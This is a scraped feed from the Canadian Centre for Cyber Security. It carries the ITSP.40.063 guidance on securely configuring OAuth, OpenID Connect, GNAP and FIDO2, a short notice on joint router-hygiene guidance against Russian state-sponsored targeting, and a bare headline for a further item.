class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/ITSPxxxxx-e.pdf">Guidance on securely configuring authorization and authentication frameworks&nbsp;- ITSP.40.063 (PDF,&nbsp;xxx&nbsp;KB)</a></p> </div>–> <section><h2>Effective date</h2> <p>This publication takes effect on July 13, 2026.</p> </section><section><h2>Revision history</h2> <ol class="list-unstyled"><li><strong>First release:</strong> July 13, 2026.</li> </ol></section><section><h2>Overview</h2> <p>This publication identifies and describes authorization and authentication frameworks that organizations can implement to protect sensitive information. For Government of Canada (GC) departments and agencies, the guidance in this publication applies to UNCLASSIFIED, PROTECTED A, and PROTECTED B information. This guidance should be used in conjunction with <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic Algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B Information (ITSP.40.111)</a>. The configurations in this publication comply with the cryptographic requirements in ITSP.40.111.</p> <p>Your organization’s ability to securely process user authorization and authentication is fundamental to the delivery of your programs and services. Using cryptographic security frameworks ensures the confidentiality, integrity and availability of information and helps protect against certain cyber intrusion threats.</p> <p>Data confidentiality, integrity, and availability, stakeholder authentication and accountability, as well as non-repudiation are all benefits of properly configured authorization and authentication frameworks. You may need to use various frameworks to satisfy your organization’s specific security requirements. You should select and implement each framework to ensure all requirements are met.</p> <p>For more information on securely configuring authorization and authentication frameworks, contact the Cyber Centre.</p> <ul><li>Email: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li>Phone: <a href="tel:+16139497048">(613) 949-7048</a> or <a href="tel:+18332923788">1‑833‑CYBER‑88</a></li> </ul></section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled mrgn-tp-lg"><li><a href="#a1">1 Introduction</a> <ul><li><a href="#a11">1.1 <abbr title="information technology">IT</abbr> security risk management process</a></li> <li><a href="#a12">1.2 General recommendations</a></li> <li><a href="#a13">1.3 Post-quantum cryptography</a></li> </ul></li> <li><a href="#a2">2 OAuth and OpenID Connect</a> <ul><li><a href="#a21">2.1 OAuth and OpenID Connect clients</a></li> <li><a href="#a22">2.2 Digital signatures and encryption</a></li> <li><a href="#a23">2.3 Authorization</a></li> <li><a href="#a24">2.4 Tokens</a></li> <li><a href="#a25">2.5 OpenID Connect UserInfo endpoint</a></li> </ul></li> <li><a href="#a3">3 Grant Negotiation and Authorization Protocol</a> <ul><li><a href="#a31">3.1 Client instance key</a></li> <li><a href="#a32">3.2 Grant response</a></li> <li><a href="#a33">3.3 Interaction</a></li> </ul></li> <li><a href="#a4">4 Fast Identity Online 2</a> <ul><li><a href="#a41">4.1 Credential registration</a></li> <li><a href="#a42">4.2 Authentication</a></li> </ul></li> </ul></details></section><h2 id="a1">1 Introduction</h2> <p>Organizations rely on information technology (IT) systems to achieve business objectives. These interconnected systems can be the targets of serious cyber attacks and other threats that jeopardize the confidentiality, integrity and availability of information assets. Compromised networks, systems or information can have adverse effects on business activities and may result in data breaches and financial loss.</p> <p>This publication provides guidance on securely configuring authorization and authentication frameworks to protect sensitive information using cryptographic algorithms recommended by the Cyber Centre for the UNCLASSIFIED, PROTECTED A, and PROTECTED B levels. It complements the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=26262">Treasury Board of Canada Secretariat (TBS) Guideline on Defining Authentication Requirements</a>. Organizations are responsible for determining their security objectives and requirements as part of their risk management framework.</p> <h3 id="a11">1.1 <abbr title="information technology">IT</abbr> security risk management process</h3> <p>When implementing security protocols, practitioners should consider the <abbr title="information technology">IT</abbr> security risk management activities described in <a href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management: A lifecycle approach (ITSP.10.033)</a>. ITSP.10.033 addresses 2 levels of <abbr title="information technology">IT</abbr> security risk management activities: departmental-level and information system-level activities. It also includes a catalogue of security controls (for example, standardized security requirements to protect the confidentiality, integrity and availability of <abbr title="information technology">IT</abbr> assets).</p> <p>Additionally, organizations should consider the following activity areas:</p> <ul><li>define</li> <li>develop</li> <li>allocate</li> <li>monitor and assess</li> <li>maintain and update</li> </ul><p>Read Organizational cyber security and privacy risk management activities (ITSP.10.036) for more information on these activities.</p> <p>Departmental-level activities (or organizational-level activities for non-GC organizations) are included in departmental or organizational security programs to plan, manage, assess and improve the management of <abbr title="information technology">IT</abbr> security risks.</p> <p>Information system-level activities are included in an information system’s lifecycle through the information system security implementation process (ISSIP). When implementing network security protocols, you should consider all the steps in the <abbr title="information system security implementation process">ISSIP</abbr>. Read System lifecycle cyber security and privacy risk management activities (ITSP.10.037) for more details on information system security risk management.</p> <h3 id="a12">1.2 General recommendations</h3> <p>For each framework listed in this publication, the recommendations are best considered as a whole package. Choosing to follow some recommendations and not others may result in security vulnerabilities.</p> <p>When using a public key infrastructure (PKI) with any of these frameworks, you should follow the <abbr title="public key infrastructure">PKI</abbr> guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>.</p> <h3 id="a13">1.3 Post-quantum cryptography</h3> <p>Quantum computers threaten to break many of the public key cryptosystems that we currently use. In August 2024, the National Institute of Standards and Technology (NIST) published standards for post-quantum cryptography that are designed to be resistant to the advantages of future quantum computers. For additional information on these standards, read <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a>.</p> <p>Once the standards for the various authorization and authentication frameworks are revised to include post-quantum cryptography, we expect to update this publication to include recommendations for post-quantum configurations.</p> <p>In the meantime, the Cyber Centre recommends the following high-level steps:</p> <ul><li>Evaluate the sensitivity of your organization’s information and determine its lifespan to identify information that may be at risk (for example, as part of on-going risk assessment processes)</li> <li>Review your <abbr title="information technology">IT</abbr> lifecycle management plan and budget for potentially significant software and hardware updates</li> <li>Educate your workforce on the quantum threat</li> </ul><p>For more detailed information, read <a href="/en/guidance/preparing-your-organization-quantum-threat-cryptography-itsap00017">Preparing your organization for the quantum threat to cryptography (ITSAP.00.017)</a>.</p> <p>Organizations should wait until the standards for using post-quantum cryptography in frameworks are finalized before revising configurations to protect information or systems.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a2">2 OAuth and OpenID Connect</h2> <p>OAuth is an authorization protocol framework that leverages a third-party authorization server enabling an end user to authorize a client to access its resources. The OpenID Connect (OIDC) protocol can be used with OAuth to provide user authentication. The recommendations in this section apply to the use of both OAuth and <abbr title="OpenID Connect">OIDC</abbr>, except when noted otherwise.</p> <p>In <abbr title="OpenID Connect">OIDC</abbr>, an OAuth client is referred to as a relying party and an OAuth authorization server is referred to as an OpenID provider or identity provider.</p> <p>The Cyber Centre recommends the use of OAuth version 2.0, originally defined in the <a href="https://datatracker.ietf.org/doc/html/rfc6749">Internet Engineering Task Force (IETF) Request for Comments (RFC) 6749 The OAuth 2.0 Authorization Framework</a> and in updates from subsequent <abbr title="Requests for Comments">RFCs</abbr> according to guidance in this section.</p> <p>When using <abbr title="OpenID Connect">OIDC</abbr>, use the version as defined in <a href="https://openid.net/specs/openid-connect-core-1_0.html">OpenID Connect Core 1.0 incorporating errata set 2</a>.</p> <p>The Cyber Centre also recommends securing all OAuth and <abbr title="OpenID Connect">OIDC</abbr> communication with Transport Layer Security (TLS) configured according to the <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>.</p> <h3 id="a21">2.1 OAuth and OpenID Connect clients</h3> <p>OAuth defines 2 types of clients: public and confidential. The Cyber Centre recommends using the ‘confidential’ client type.</p> <p>When making requests to the OAuth authorization server, your organization should use 1 of the following methods for client authentication:</p> <ul><li>client_secret_jwt</li> <li>private_key_jwt</li> <li>tls_client_auth (when only using OAuth)</li> <li>self_signed_tls_client_auth (when only using OAuth)</li> </ul><p>When using either the "client_secret_jwt" or "private_key_jwt" authentication method, the authorization server’s issuer identifier should be used as the value for the "aud" claim.</p> <h4>2.1.1 Client registration and server discovery</h4> <p>To register OAuth and <abbr title="OpenID Connect">OIDC</abbr> clients, the Cyber Centre recommends using dynamic registration in accordance with the <a href="https://datatracker.ietf.org/doc/html/rfc7591"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 7591 OAuth 2.0 Dynamic Client Registration Protocol</a>, and with <a href="https://openid.net/specs/openid-connect-registration-1_0.html">OpenID Connect Dynamic Client Registration 1.0 incorporating errata set 2</a> when registering <abbr title="OpenID Connect">OIDC</abbr> clients. When these 2 specifications conflict, follow the guidance in <abbr title="Request for Comments">RFC</abbr> 7591.</p> <p>During registration, the Cyber Centre recommends registering the following optional information with the authorization server:</p> <ul><li>all redirection uniform resource identifiers (URIs) the client may use in the authorization request; all <abbr title="uniform resource identifiers">URIs</abbr> should be complete and use the ‘https’ scheme</li> <li>the client’s authentication method and associated signature algorithms that will be used at the authorization server’s endpoints</li> <li>the signature and encryption algorithms to be used by both parties throughout the protocol</li> </ul><p>Clients should register each redirection <abbr title="uniform resource identifier">URI</abbr> with only 1 authorization server.</p> <p>The Cyber Centre recommends using the "jwks_uri" client parameter. Clients incapable of hosting public uniform resource locators (URLs) should use the "jwks" parameter.</p> <p>In addition, the Cyber Centre recommends that authorization servers:</p> <ul><li>provide a way for clients to query and update the registration information</li> <li>assign unique client IDs to different instances of the same software</li> <li>assign unique client secrets to all registration requests, even those from the same software or software instance</li> <li>provide lists of supported signature and encryption algorithms for each type of data being signed or encrypted</li> <li>provide the location of the UserInfo endpoint (when using <abbr title="OpenID Connect">OIDC</abbr>)</li> </ul><p>When using <abbr title="OpenID Connect">OIDC</abbr>, use the <abbr title="OpenID Connect">OIDC</abbr> discovery protocol as specified in <a href="https://openid.net/specs/openid-connect-discovery-1_0.html">OpenID Connect Discovery 1.0 incorporating errata set 2</a>.</p> <h3 id="a22">2.2 Digital signatures and encryption</h3> <p>OAuth and <abbr title="OpenID Connect">OIDC</abbr> make extensive use of JavaScript Object Notation (JSON) Web Signatures (JWS) and <abbr title="JavaScript Object Notation">JSON</abbr> Web Encryptions (JWE).</p> <p>Where a <strong><abbr title="JSON Web Signature">JWS</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"alg" parameter</strong>:</p> <ul><li>PS256 (RSASSA-PSS using SHA-256 and MGF1 with SHA-256)</li> <li>PS384 (RSASSA-PSS using SHA-384 and MGF1 with SHA-384)</li> <li>PS512 (RSASSA-PSS using SHA-512 and MGF1 with SHA-512</li> <li>ES256 (ECDSA using P-256 and SHA-256)</li> <li>ES384 (ECDSA using P-384 and SHA-384)</li> <li>ES512 (ECDSA using P-521 and SHA-512)</li> <li>Ed25519 (EdDSA using Ed25519 curve)</li> <li>Ed448 (EdDSA using Ed448 curve)</li> </ul><p>If <strong>none of the above</strong> are available, it is sufficient to use 1 of the following:</p> <ul><li>RS256 (RSASSA-PKCS1-v1_5 using SHA-256)</li> <li>RS384 (RSASSA-PKCS1-v1_5 using SHA-384)</li> <li>RS512 (RSASSA-PKCS1-v1_5 using SHA-512)</li> </ul><p>If it is necessary to use the <strong>"client_secret_jwt" authentication method</strong>, 1 of the following algorithms may be used for the <strong><abbr title="JSON Web Signature">JWS</abbr> "alg" parameter</strong> when signing the client authentication <abbr title="JavaScript Object Notation">JSON</abbr> Web Token (JWT):</p> <ul><li>HS256 (HMAC using SHA-256)</li> <li>HS384 (HMAC using SHA-384)</li> <li>HS512 (HMAC using SHA-512)</li> </ul><p>Where a <strong><abbr title="JSON Web Encryptions">JWE</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"alg" parameter</strong>:</p> <ul><li>RSA-OAEP-256 (RSAES OAEP using SHA-256 and MGF1 with SHA-256)</li> <li>RSA-OAEP-384 (RSA-OAEP using SHA-384 and MGF1 with SHA-384)</li> <li>RSA-OAEP-512 (RSA-OAEP using SHA-512 and MGF1 with SHA-512)</li> <li>ECDH-ES (ECDH-ES using Concat KDF)</li> <li>ECDH-ES+A128KW (ECDH-ES using Concat KDF and "A128KW" wrapping)</li> <li>ECDH-ES+A192KW (ECDH-ES using Concat KDF and "A192KW" wrapping)</li> <li>ECDH-ES+A256KW (ECDH-ES using Concat KDF and "A256KW" wrapping)</li> </ul><p>Where a <strong><abbr title="JSON Web Encryptions">JWE</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"enc" parameter</strong>:</p> <ul><li>A128CBC-HS256 (AES_128_CBC_HMAC_SHA_256 authenticated encryption algorithm)</li> <li>A192CBC-HS384 (AES_192_CBC_HMAC_SHA_384 authenticated encryption algorithm)</li> <li>A256CBC-HS512 (AES_256_CBC_HMAC_SHA_512 authenticated encryption algorithm)</li> <li>A128GCM (AES GCM using 128-bit key)</li> <li>A192GCM (AES GCM using 192-bit key)</li> <li>A256GCM (AES GCM using 256-bit key)</li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="a23">2.3 Authorization</h3> <p>The Cyber Centre recommends using the authorization code grant for OAuth and the authorization code flow for <abbr title="OpenID Connect">OIDC</abbr>. When an OAuth client is requesting access to its own resources, the client credentials grant can be used instead.</p> <p>Authorization codes should have a maximum lifetime of 60 seconds.</p> <h4>2.3.1 Authorization requests and responses</h4> <p>The Cyber Centre recommends using the "state" and "redirect_uri" parameters in authorization requests, and authorization servers should perform exact string matching of the "redirect_uri" against the <abbr title="uniform resource identifiers">URIs</abbr> provided at registration. You should also use the "nonce" parameter when you use <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>The Cyber Centre recommends using 1 of the following response modes:</p> <ul><li>form_post</li> <li>jwt (encrypted)</li> <li>jwt (encrypted)</li> <li>jwt (either encrypted or unencrypted)</li> </ul><p>When using OAuth, you should use rich authorization requests, as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9396"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9396 OAuth 2.0 Rich Authorization Requests</a> and the Proof Key for Code Exchange (PKCE) extension defined in <a href="https://datatracker.ietf.org/doc/html/rfc7636"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 7636 Proof Key for Code Exchange by OAuth Public Clients</a> with "S256" as the code challenge method. Use of PKCE with <abbr title="OpenID Connect">OIDC</abbr> is optional.</p> <p>At least 1 of the "state", "nonce", and "code_challenge" parameters should be cryptographically bound to the user agent.</p> <p>Authorization responses should contain the issuer identifier claim "iss" as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9207"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9207 OAuth 2.0 Authorization Server Issue Identification</a> or be encoded as defined in <a href="https://openid.net/specs/oauth-v2-jarm.html"><abbr title="JSON Web Token">JWT</abbr> Secured Authorization Response Mode for OAuth 2.0 (JARM)</a>.</p> <h4>2.3.2 Pushed authorization requests</h4> <p>The Cyber Centre recommends the use of pushed authorization requests, as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9126"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9126 OAuth 2.0 Pushed Authorization Requests</a>. Any <abbr title="uniform resource identifiers">URIs</abbr> generated by the authorization server for use with pushed authorization requests should have a maximum lifetime of 60 seconds and be single use. Clients should not be allowed to use unregistered redirect <abbr title="uniform resource identifiers">URIs</abbr>.</p> <h4>2.3.3 <abbr title="JSON Web Token">JWT</abbr>-secured authorization request</h4> <p>The <abbr title="JSON Web Token">JWT</abbr>-secured authorization request (JAR), as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9101"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9101 The OAuth 2.0 Authorization Framework: <abbr title="JSON Web Token">JWT</abbr>-Secured Authorization Request (JAR)</a>, may optionally be used. When <abbr title="JWT-Secured Authorization Request">JAR</abbr> is used, the Cyber Centre recommends using the "request" parameter to send the request object to the authorization server. Request objects should be signed and the keys used should not be used for signing other <abbr title="JSON Web Tokens">JWTs</abbr>. The request object may optionally be encrypted after signing. Additionally, request objects should be single-use and contain a unique "state" parameter. For <abbr title="OpenID Connect">OIDC</abbr>, the request object should contain a unique "nonce" parameter. Authorization servers should verify the source of a request by verifying the <abbr title="JSON Web Signature">JWS</abbr>.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="a24">2.4 Tokens</h3> <h4>2.4.1 Token exchange</h4> <p>The Token Exchange allows a client to obtain access and ID tokens. The client should include the redirection <abbr title="uniform resource identifier">URI</abbr> value in the token request and ensure that the value is the same as in the corresponding authorization request.</p> <p>The authorization server should verify that an authorization code is only redeemed once. If there is an attempt to use it again, the authorization server should revoke all tokens issued for the authorization code.</p> <h4>2.4.2 Access tokens</h4> <p>Access tokens authorize a client to access a resource server on behalf of a user. The Cyber Centre recommends that implementations format access tokens as <abbr title="JSON Web Tokens">JWTs</abbr> that are signed and optionally encrypted.</p> <p>Access tokens should:</p> <ul><li>have a maximum lifetime of 3,600 seconds</li> <li>be passed in the HTTP header</li> <li>be associated to a single resource server</li> </ul><p>When using OAuth, the authorization details object should be included as a claim in the token.</p> <p>The Cyber Centre recommends the use of sender-constrained resource access tokens using 1 of the following methods:</p> <ul><li>mutual <abbr title="Transport Layer Security">TLS</abbr> as described in <a href="https://datatracker.ietf.org/doc/html/rfc8705"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 8705 OAuth 2.0 Mutual-<abbr title="Transport Layer Security">TLS</abbr> Client Authentication and Certificate-Bound Access Tokens</a></li> <li>demonstration of proof of possession as described in <a href="https://datatracker.ietf.org/doc/html/rfc9449"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9449 OAuth 2.0 Demonstrating Proof of Possession (DPoP)</a></li> </ul><p>When mutual <abbr title="Transport Layer Security">TLS</abbr> is used, you should:</p> <ul><li>follow the <abbr title="Transport Layer Security">TLS</abbr> configuration guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a></li> <li>bind access tokens to the client certificate</li> <li>ensure that any hash functions used in a confirmation method are compliant with <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a></li> </ul><p>When demonstrating proof of possession (DPoP) is used, you should use a server-provided "<abbr title="demonstrating proof of possession">DPoP</abbr> nonce" and bind the authorization code to the <abbr title="demonstrating proof of possession">DPoP</abbr> key.</p> <h4>2.4.3 OpenID Connect ID tokens</h4> <p>This subsection only applies to <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>An ID token contains claims asserting that the user has been authenticated. When an ID token and access token are issued together, the "at_hash" claim should be included in the ID token.</p> <p>The Cyber Centre recommends that all ID tokens be signed and that ID tokens returned from an authorization endpoint be encrypted. ID tokens returned from a token endpoint may optionally be encrypted.</p> <h4>2.4.4 Refresh tokens</h4> <p>A refresh token permits a client to obtain a new access or ID token without reauthenticating the user. The Cyber Centre recommends formatting refresh tokens as signed <abbr title="JSON Web Tokens">JWTs</abbr> which may optionally be encrypted.</p> <p>In addition, refresh tokens should be:</p> <ul><li>revokable and have an expiration time</li> <li>sender-constrained or one-time use</li> <li>used with refresh token rotation</li> </ul><p>When using <abbr title="OpenID Connect">OIDC</abbr>, if an ID token is being returned in a refresh response, this token should not contain the nonce that was in the original ID token.</p> <h3 id="a25">2.5 OpenID Connect UserInfo endpoint</h3> <p>This subsection only applies to <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>A UserInfo endpoint permits clients to retrieve claims about an authenticated user. UserInfo requests should use the HTTP "GET" method and send access tokens using the "authorization" header field.</p> <p>The Cyber Centre also recommends that the UserInfo response be signed. The UserInfo response may optionally be encrypted after signing.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a3">3 Grant Negotiation and Authorization Protocol</h2> <p>The Grant Negotiation and Authorization Protocol (GNAP) is specified in <a href="https://datatracker.ietf.org/doc/html/rfc9635/"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9635 Grant Negotiation and Authorization Protocol (GNAP)</a> and <a href="https://datatracker.ietf.org/doc/html/rfc9767/"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9767 Grant Negotiation and Authorization Protocol Resource Server Connections</a>. It defines a mechanism for a client software instance to make a request to an authorization server for delegated access to a user’s resources on a resource server and/or subject information.</p> <h3 id="a31">3.1 Client instance key</h3> <p>The client instance key is bound to the access token for a particular client instance and can be used by authorization servers to identify such an instance. Clients interacting with multiple authorization servers should use a different key for each server they interact with.</p> <p>Clients should use 1 of the following key formats:</p> <ul><li>jwk</li> <li>cert</li> <li>cert#S256</li> </ul><p>When using the jwk format, use 1 of the following algorithms for the "alg" parameter:</p> <ul><li>RSA-OAEP-256 (RSAES OAEP using SHA-256 and MGF1 with SHA-256)</li> <li>RSA-OAEP-384 (RSA-OAEP using SHA-384 and MGF1 with SHA-384)</li> <li>RSA-OAEP-512 (RSA-OAEP using SHA-512 and MGF1 with SHA-512)</li> <li>ECDH-ES (ECDH-ES using Concat KDF)</li> <li>ECDH-ES+A128KW (ECDH-ES using Concat KDF and "A128KW" wrapping)</li> <li>ECDH-ES+A192KW (ECDH-ES using Concat KDF and "A192KW" wrapping)</li> <li>ECDH-ES+A256KW (ECDH-ES using Concat KDF and "A256KW" wrapping)</li> <li>A128KW (AES Key Wrap using 128-bit key)</li> <li>A192KW (AES Key Wrap using 192-bit key)</li> <li>A256KW (AES Key Wrap using 256-bit key)</li> <li>A128GCMKW (Key wrapping with AES GCM using 128-bit key)</li> <li>A192GCMKW (Key wrapping with AES GCM using 192-bit key)</li> <li>A256GCMKW (Key wrapping with AES GCM using 256-bit key)</li> </ul><p>The Cyber Centre further recommends using of 1 of the following proof formats, which are defined in <abbr title="Request for Comments">RFC</abbr> 9635:</p> <ul><li>httpsig</li> <li>mtls</li> <li>jwsd</li> <li>jws</li> </ul><h3 id="a32">3.2 Grant response</h3> <p>Upon receiving a client instance request, the authorization server sends a grant response. In the grant response, 1 of the following token formats, defined in <abbr title="Request for Comments">RFC</abbr> 9767, should be used:</p> <ul><li>jwt-signed</li> <li>jwt-encrypted</li> </ul><p>Bearer tokens should not be used as access tokens outside trusted internal systems. All access tokens should be bound to a key. ID tokens should use the "id_token" assertion format, which is defined in <abbr title="Request for Comments">RFC</abbr> 9635.</p> <h3 id="a33">3.3 Interaction</h3> <p>The Cyber Centre recommends using the following:</p> <ul><li>the "redirect" interaction start mode</li> <li>the "redirect" interaction finish method</li> <li>1 of the following hash methods for the interaction finish hash method: <ul><li>sha-256</li> <li>sha-384</li> <li>sha-512</li> <li>sha3-256</li> <li>sha3-384</li> <li>sha3-512</li> </ul></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a4">4 Fast Identity Online 2</h2> <p>Fast Identity Online 2 (FIDO2) is a framework consisting of 2 protocols: <a href="https://www.w3.org/TR/webauthn-2/">Web Authentication</a> (WebAuthn) and the <a href="https://fidoalliance.org/specs/fido-v2.2-ps-20250714/fido-client-to-authenticator-protocol-v2.2-ps-20250714.html">Client-to-Authenticator Protocol</a> (CTAP). When used together, they allow a server, known as the relying party, to authenticate an end user using public key cryptography-based passkeys rather than traditional passwords.</p> <p>The Cyber Centre recommends securing all communication between the relying party’s server and application with <abbr title="Transport Layer Security">TLS</abbr> configured according to the guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>. Client-side applications should verify the authenticity of the server before performing any actions on behalf of the server.</p> <p>Relying parties should use a WebAuthn application programming interface (API) provided by a web browser or operating system to perform FIDO2 operations.</p> <h3 id="a41">4.1 Credential registration</h3> <p>In the "PublicKeyCredentialCreationOptions" object:</p> <ul><li>the "attestation" option should be set to "direct"</li> <li>the "authenticatorSelection" option should have the following parameters: <ul><li>"residentKey" set to "required"</li> <li>"requireResidentKey" set to "true"</li> <li>"userVerification" set to "required"</li> </ul></li> <li>the "pubKeyCredParams" option should use 1 of the following for the "alg" parameter: <ul><li>ES256 (ECDSA w/ SHA-256)</li> <li>ES384 (ECDSA w/ SHA-384)</li> <li>ES512 (ECDSA w/ SHA-512)</li> <li>Ed25519 (EdDSA using Ed25519 curve)</li> <li>Ed448 (EdDSA using Ed448 curve)</li> <li>PS256 (RSASSA-PSS using SHA-256 and MGF1 with SHA-256)</li> <li>PS384 (RSASSA-PSS using SHA-384 and MGF1 with SHA-384)</li> <li>PS512 (RSASSA-PSS using SHA-512 and MGF1 with SHA-512</li> </ul></li> <li>if none of the above "alg" parameter values are available, it is sufficient to use 1 of the following: <ul><li>RS256 (RSASSA-PKCS1-v1_5 using SHA-256)</li> <li>RS384 (RSASSA-PKCS1-v1_5 using SHA-384)</li> <li>RS512 (RSASSA-PKCS1-v1_5 using SHA-512)</li> </ul></li> </ul><p>Relying parties should support the credential protection extension with the parameter "enforceCredentialProtectionPolicy" set to "true" and "credentialProtectionPolicy" set to "userVerificationRequired’.</p> <p>Attestation should be required in the response to the credential creation request. In addition, the relying party should only accept an attestation that chains to a root certificate from a trusted source.</p> <h3 id="a42">4.2 Authentication</h3> <p>The Cyber Centre recommends setting the "userVerification" option to "required" in the "PublicKeyCredentialRequestOptions" object.</p> <p>The authentication should fail if the signature count received in an authentication response is less than or equal to the signature count that the relying party currently associates with the credential.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> </div> </div> </div> </div> </div> </div> </div> </article>

  • Joint guidance on improving router hygiene to protect against Russian state-sponsored targeting
    by Canadian Centre for Cyber Security on July 13, 2026 at 5:41 pm

    <article data-history-node-id="7949" about="/en/news-events/joint-guidance-improving-router-hygiene-protect-against-russian-state-sponsored-targeting" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) has joined the United States’ National Security Agency (NSA) and the following international partners in releasing cyber security guidance on improving router hygiene to protect against Russian state-sponsored targeting:</p> <ul><li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li> <li>Czech Republic’s National Cyber and Information Security Agency (NÚKIB)</li> <li>Danish Defence Intelligence Service (DDIS)</li> <li>Estonian Foreign Intelligence Service (EFIS)</li> <li>Estonian Information System Authority (RIA)</li> <li>Finnish Defence Intelligence Agency (FDI)</li> <li>Finnish Security and Intelligence Service (SUPO)</li> <li>French Cyber Security Agency (ANSSI)</li> <li>Italian External Intelligence and Security Agency (AISE)</li> <li>Italian Internal Intelligence and Security Agency (AISI)</li> <li>New Zealand’s National Cyber Security Centre (NCSC-NZ)</li> <li>Swedish National Cyber Security Centre (NCSC-SE)</li> <li>The Military Counterintelligence Service of Poland (SKW)</li> <li>United Kingdom’s National Cyber Security Centre (NCSC-UK)</li> <li>United States’ Cybersecurity and Infrastructure Security Agency (CISA)</li> <li>United States’ Department of Defense Cyber Crime Center (DC3)</li> <li>United States’ Federal Bureau of Investigation (FBI)</li> </ul><p>This joint guidance details how cyber actors from the Russian Federal Security Service (FSB) Center 16 continue to exploit poorly configured and vulnerable networking devices worldwide, opportunistically targeting multiple critical infrastructure sector networks. It builds on the <abbr title="US Federal Bureau of Investigation">FBI</abbr>’s public service announcement, <a href="https://www.ic3.gov/PSA/2025/PSA250820">Russian government cyber actors targeting networking devices, critical infrastructure</a>, concerning the decade-long <abbr title="Russian Federal Security Service">FSB</abbr> Center 16’s cyber activity. This guidance also provides additional tactics, techniques, and procedures to help defenders to better understand and counter the threat.</p> <p>The authoring agencies urge device owners and network defenders to take mitigation and remediation actions against Russian government-sponsored exploitation of vulnerable routers.</p> <p>Consult the full joint guidance: <a href="https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/1/CSA_IMPROVE_ROUTER_HYGIENE.PDF">Improve router hygiene to protect against Russian state-sponsored targeting (PDF)</a>.</p> </div> </div> </div> </div> </div> </article>

  • SharpViewStateKing: The stealthy implant framework
    by Canadian Centre for Cyber Security on July 10, 2026 at 2:29 pm

